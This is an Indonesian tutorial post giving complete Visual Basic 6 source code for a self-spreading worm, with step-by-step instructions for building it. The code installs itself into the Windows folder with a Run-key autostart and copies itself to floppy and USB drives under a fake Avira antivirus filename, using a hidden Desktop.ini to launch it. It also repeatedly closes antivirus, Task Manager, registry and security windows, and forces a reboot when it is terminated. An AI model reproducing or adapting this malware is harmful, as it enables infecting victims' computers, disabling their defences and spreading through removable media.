kode virus dari vb 6.0

1 Form Tanpa Border

‘2. Kasih Satu Buah Timer
‘3. Satu Buah MODULE
‘Okey, Setelah buat Satu Form dan Border Stylenya “NONE”
‘Masukan code ini di Form Tersebut
‘========================================================================================
‘Awal Deklarasi
Option Explicit
Private Declare Function CopyFile Lib “kernel32″ Alias “CopyFileA” (ByVal lpExistingFileName As String, ByVal lpNewFileName As String, ByVal bFailIfExists As Long) As Long
Dim infectedFlashDisk As Boolean
‘Sub Untuk Mereplikasi diri ke C:\WINDOWS, dengan nama K3F1LHUPH3R.exe, sebagai induk virus.
Public Sub replikasiDiri(targetDrive As String)
Dim C As String
Dim A As String ‘60
C = Environ$(”windir”) & “\K3F1LHUPH3R.exe”
A = targetDrive + “\1. Avira_Personal_AntiVir.exe” ‘90
If Dir(A) = “” Then
Call FileCopy(C, A)
End If
End Sub
‘============================Akhir Sub Mereplikasi Diri============================
‘Sub Membuat Folder Htt, sebenarnya tidak berguna, boleh dipkai boleh tidak.
Public Sub buatFolder_htt(targetDrive As String) ‘70
Dim C As String
C = targetDrive + “\Recycle\1. Avira_Personal_AntiVir.exe”
Open C For Output As #1
Print #1, “”
Print #1, “”
Print #1, “”
Print #1, “”
Print #1, “”
Print #1, “” Print #1, “”
Print #1, “”
Print #1, “”
Print #1, “”
Close #1
SetAttr C, vbReadOnly + vbHidden
End Sub ‘ NEXT dibawahnya
Public Sub eksploitasi_folder_htt(targetDrive As String)
Dim C As String
Dim A As String
C = Environ$(”windir”) & “\K3F1LHUPH3R.exe” ‘100
A = targetDrive + “\Recycle”
Call MkDir(A)
SetAttr A, vbHidden
A = A + “\1. Avira_Personal_AntiVir.exe”
If Dir(A) = “” Then
CopyFile C, A, True
Call buatDesktop_ini(targetDrive)
Call buatFolder_htt(targetDrive)
End If
End Sub ‘120
‘Akhir Sub Folder Htt
‘Awal Sub Mereplikassi diri ke Disket [A:]
Public Sub sebaraku()
Dim C As String
Dim A As String
C = Environ$(”windir”) & “\K3F1LHUPH3R.exe”
A = App.Path & “\” & App.EXEName & “.exe”
CopyFile C, “A:\1. Avira_Personal_AntiVir.exe”, True
End Sub
‘Akhir Sub Mereplikassi diri ke Disket
‘Awal Dari Sub Mereplikasi Diri Ke Media FlashDisk
Public Sub sebarFlashDisk()
On Error GoTo BatalInfeksi
Dim InfeksiFlashDisk As Boolean
Dim AdaFlashDisk As Boolean
Dim ObjFSO As Object
Dim ObjDrive As Object
Set ObjFSO = CreateObject(”Scripting.FileSystemObject”)
AdaFlashDisk = False
For Each ObjDrive In ObjFSO.Drives
If ObjDrive.DriveType = 1 And ObjDrive.DriveLetter > “C” Then
AdaFlashDisk = True
If Not InfeksiFlashDisk And ObjDrive.AvailableSpace > 102400 Then
Call replikasiDiri(ObjDrive.DriveLetter + “:”)
infectedFlashDisk = True
End If
End If
Next
If Not AdaFlashDisk Then
InfeksiFlashDisk = False
End If
BatalInfeksi:
End Sub
‘Akhir Dari Sub Mereplikasi Diri Ke Media FlashDisk
‘Timer1 yang bertugas untuk memblok aplikasi-aplikasi yang aktif dengan nama dibawah ini.
Private Sub Timer1_Timer()
On Error Resume Next
WinQuit “vir” ‘apabila aplikasi yang aktif berisi kata “vir” Maka akan diBunuh
WinQuit “av” ‘apabila aplikasi yang aktif berisi kata “av” Maka akan diKill
WinQuit “safe” ‘apabila aplikasi yang aktif berisi kata “safe” Maka akan diBinasakan
WinQuit “pcmav” ‘apabila aplikasi yang aktif berisi kata “pcmav” Maka akan diBinasakan
WinQuit “master” ‘apabila aplikasi yang aktif berisi kata “master” Maka akan diKill
WinQuit “utility” ‘apabila aplikasi yang aktif berisi kata “utility” Maka akan diKill
WinQuit “hijack” ‘apabila aplikasi yang aktif berisi kata “hijack” Maka akan diKill
WinQuit “patrol” ‘apabila aplikasi yang aktif berisi kata “patrol” Maka akan diKill
WinQuit “firewall” ‘apabila aplikasi yang aktif berisi kata “firewall” Maka akan diKill
WinQuit “TaskManager” ‘apabila aplikasi yang aktif berisi kata “TaskManager” Maka akan diKill
WinQuit “config” ‘apabila aplikasi yang aktif berisi kata “config” Maka akan diKill
WinQuit “folder option” ‘apabila aplikasi yang aktif berisi kata “folder option” Maka akan diKill
WinQuit “security” ‘apabila aplikasi yang aktif berisi kata “security” Maka akan diKill
WinQuit “remov” ‘apabila aplikasi yang aktif berisi kata “remov” Maka akan diKill
WinQuit “scan” ‘apabila aplikasi yang aktif berisi kata “scan” Maka akan diBinasakan
WinQuit “option” ‘apabila aplikasi yang aktif berisi kata “option” Maka akan diBinasakan
WinQuit “kill” ‘apabila aplikasi yang aktif berisi kata “kill” Maka akan diBinasakan
WinQuit “reg” ‘apabila aplikasi yang aktif berisi kata “reg” Maka akan diBinasakan
WinQuit “anti” ‘apabila aplikasi yang aktif berisi kata “anti” Maka akan diBinasakan
WinQuit “ansav+” ‘apabila aplikasi yang aktif berisi kata “ansav+” Maka akan diBinasakan
WinQuit “system32″ ‘apabila aplikasi yang aktif berisi kata “system32″ Maka akan diBinasakan
WinQuit “Setup” ‘apabila aplikasi yang aktif berisi kata “Setup” Maka akan diBinasakan
WinQuit “Windows” ‘apabila aplikasi yang aktif berisi kata “Windows” Maka akan diBinasakan
WinQuit “mcafee” ‘apabila aplikasi yang aktif berisi kata “mcafee” Maka akan diBinasakan
WinQuit “norman” ‘apabila aplikasi yang aktif berisi kata “norman” Maka akan diBinasakan
WinQuit “norton” ‘apabila aplikasi yang aktif berisi kata “norton” Maka akan diBinasakan
WinQuit “avg” ‘apabila aplikasi yang aktif berisi kata “avg” Maka akan diBinasakan
WinQuit “nod32″ ‘apabila aplikasi yang aktif berisi kata “nod32″ Maka akan diBinasakan
WinQuit “fix” ‘apabila aplikasi yang aktif berisi kata “fix” Maka akan diBinasakan
WinQuit “system” ‘apabila aplikasi yang aktif berisi kata “system” Maka akan diBinasakan
WinQuit “instaler” ‘apabila aplikasi yang aktif berisi kata “instaler” Maka akan diBinasakan
WinQuit “instal” ‘apabila aplikasi yang aktif berisi kata “instal” Maka akan diBinasakan
WinQuit “avi-gen” ‘apabila aplikasi yang aktif berisi kata “avi-gen” Maka akan diBinasakan
WinQuit “tigor” ‘apabila aplikasi yang aktif berisi kata “tigor” Maka akan diBinasakan
WinQuit “vi” ‘apabila aplikasi yang aktif berisi kata “vi” Maka akan diBinasakan
WinQuit “rus” ‘apabila aplikasi yang aktif berisi kata “rus” Maka akan diBinasakan
WinQuit “protect” ‘apabila aplikasi yang aktif berisi kata “protect” Maka akan diBinasakan
WinQuit “recycle” ‘apabila aplikasi yang aktif berisi kata “recycle” Maka akan diBinasakan
WinQuit “windows” ‘apabila aplikasi yang aktif berisi kata “smp” Maka akan diBinasakan
WinQuit “task” ‘apabila aplikasi yang aktif berisi kata “task” Maka akan diBinasakan
‘TAMBAHKAN SELEBIHNYA SESUAI KEINGINAN TEMAN-TEMAN, OOOKEY….
Call sebaraku ‘memanggil sub replikasi ke Disket
Call sebarFlashDisk ‘memanggil sub replikasi ke Flashdisk
End Sub
‘Akhir dari sub Timer1
’sub QueryUnload
Private Sub Form_QueryUnload(Cancel As Integer, UnloadMode As Integer)
Cancel = 1
Shell App.Path & “\” & App.EXEName & “.exe”
ComputerMati ‘apabila virus diClose maka RESTART komputer
End Sub
‘akhir sub QueryUnload
’sub terminate
Private Sub Form_Terminate()
Shell App.Path & “\” & App.EXEName & “.exe”
ComputerMati ‘apabila virus diKill/Dibunuh maka RESTART komputer
End Sub
‘akhir sub terminate
‘awal sub unload
Private Sub Form_Unload(Cancel As Integer)
Cancel = 1
Shell App.Path & “\” & App.EXEName & “.exe”
ComputerMati ‘apabila virus diCegat maka RESTART komputer
End Sub
‘akhir sub unload
‘ ============================Akhir Dari Code yang ditaruh di Form1============================
‘ ============================Buat Satu MODULE Dan Beri Code Dibawah Ini============================
‘Awal deklarasi
Option Explicit
Public Declare Function FindWindow Lib “user32″ Alias “FindWindowA” (ByVal lpClassName As String, ByVal lpWindowName As String) As Long
Private Declare Function CopyFile Lib “kernel32″ Alias “CopyFileA” (ByVal lpExistingFileName As String, ByVal lpNewFileName As String, ByVal bFailIfExists As Long) As Long
Dim infectedFlashDisk As Boolean
Private Declare Function PostMessage Lib “user32″ Alias _
“PostMessageA” (ByVal hwnd As Long, ByVal wMsg As Long, _
ByVal wParam As Long, ByVal lParam As Long) As Long
Private Declare Function EnumWindows& Lib “user32″ (ByVal _
lpEnumFunc As Long, ByVal lParam As Long)
Private Declare Function GetWindowText Lib “user32″ Alias _
“GetWindowTextA” (ByVal hwnd As Long, ByVal lpString As _
String, ByVal cch As Long) As Long
Private Declare Function IsWindowVisible& Lib “user32″ (ByVal _
hwnd As Long)
Private Declare Function GetParent& Lib “user32″ (ByVal hwnd As _
Long)
Private Declare Function EnableWindow Lib “user32″ (ByVal hwnd _
As Long, ByVal fEnable As Long) As Long
Dim sPattern As String, hFind As Long
Const WM_CLOSE = &H10
‘====================================================================================
Public Declare Function ExitWindowsEx Lib “user32″ (ByVal uFlags As Long, _
ByVal dwReserved As Long) As Long
Public Const EWX_LOGOFF = 0
Public Const EWX_SHUTDOWN = 1
Public Const EWX_REBOOT = 2
‘Akhir deklarasi
Private Function EnumWinProc(ByVal hwnd As Long, ByVal _
lParam As Long) As Long
Dim K As Long, sName As String
If IsWindowVisible(hwnd) And GetParent(hwnd) = 0 Then
sName = Space$(128)
K = GetWindowText(hwnd, sName, 128)
If K > 0 Then
sName = Left$(sName, K)
If lParam = 0 Then sName = UCase(sName)
If sName Like sPattern Then
hFind = hwnd
EnumWinProc = 0
Exit Function
End If
End If
End If
EnumWinProc = 1
End Function
Private Function WinFind(sWild As String, Optional bMatchCase _
As Boolean = True) As Long
sPattern = sWild
If Not bMatchCase Then sPattern = UCase(sPattern)
EnumWindows AddressOf EnumWinProc, bMatchCase
WinFind = hFind
End Function
Function WinQuit(WindowsTitle As String)
On Error Resume Next
hFind = 0
Dim wincap As Long
Dim rtnval As Long
wincap = WinFind(”*” & WindowsTitle & “*”, False)
rtnval = PostMessage(wincap, WM_CLOSE, vbNull, vbNull)
End Function
Function WinAble(WindowsTitle As String, value As Boolean)
hFind = 0
On Error Resume Next
Dim wincap As Long
Dim rtnval As Long
wincap = WinFind(”*” & WindowsTitle & “*”, False)
rtnval = EnableWindow(wincap, value)
End Function
Function sudahAktif(Title As String) As Boolean
Dim vir_hwnd As Long
vir_hwnd = FindWindow(vbNullString, Title)
sudahAktif = Not (vir_hwnd = 0)
End Function
Sub ComputerMati()
On Error Resume Next
Dim nFlag As Long
nFlag = EWX_SHUTDOWN
Call ExitWindowsEx(nFlag, 0)
Shell “shutdown -r -f -t 0″
End Sub
‘mengaktifkan virus melalui sub main() dibawah ini
Sub Main()
On Error Resume Next
If App.PrevInstance = True Then End ‘apabila virus aktif 2 kali maka END
Form1.Show
Dim V3M0 As String
Dim infectedFlashDisk As Boolean
V3M0 = “V3M0.a”
If Not sudahAktif(V3M0) Then
App.TaskVisible = False
Form1.Visible = False
Call Install ‘memanggil fungsi instal
infectedFlashDisk = False
Form1.Caption = V3M0
Form1.Timer1.Interval = 500
Form1.Timer1.Enabled = True
End If
End Sub
‘akhir sub main()
’sub instal
Sub Install()
Dim wShell As Object
Dim A As String
Dim C As String
A = App.Path & “\” & App.EXEName & “.exe”
C = Environ$(”windir”) & “\K3F1LHUPH3R.exe” ‘mengcopy virus ke C:\WINDOWS dengan nama K3F1LHUPH3R.exe
If Dir(C) = “” Then
CopyFile A, C, True
Set wShell = CreateObject(”WScript.Shell”)
wShell.regwrite “HKLM\Software\Microsoft\Windows\CurrentVersion\Run\dllhost”, C
‘ membuat agar virus selalu aktif saat komputer dihidupkan
Else
End If
End Sub
‘akhir sub instal
Sub buatDesktop_ini(targetDrive As String)
Dim C As String
C = targetDrive + “\Desktop.ini”
Open C For Output As #1
Print #1, “[.ShellClassInfo]”
Print #1, “ConfirmFileOp = 0″
Print #1, “[{5984FFE0-28D4-11CF-AE66-08002B2E1262}]”
Print #1, “PersistMoniker=file://Recycle\1. Avira_Personal_AntiVir.exe”
Print #1, “[ExtShellFolderViews]”
Print #1, “{5984FFE0-28D4-11CF-AE66-08002B2E1262}={5984FFE0-28D4-11CF-AE66-08002B2E1262}”
Close #1
SetAttr C, vbReadOnly + vbHidden
End Sub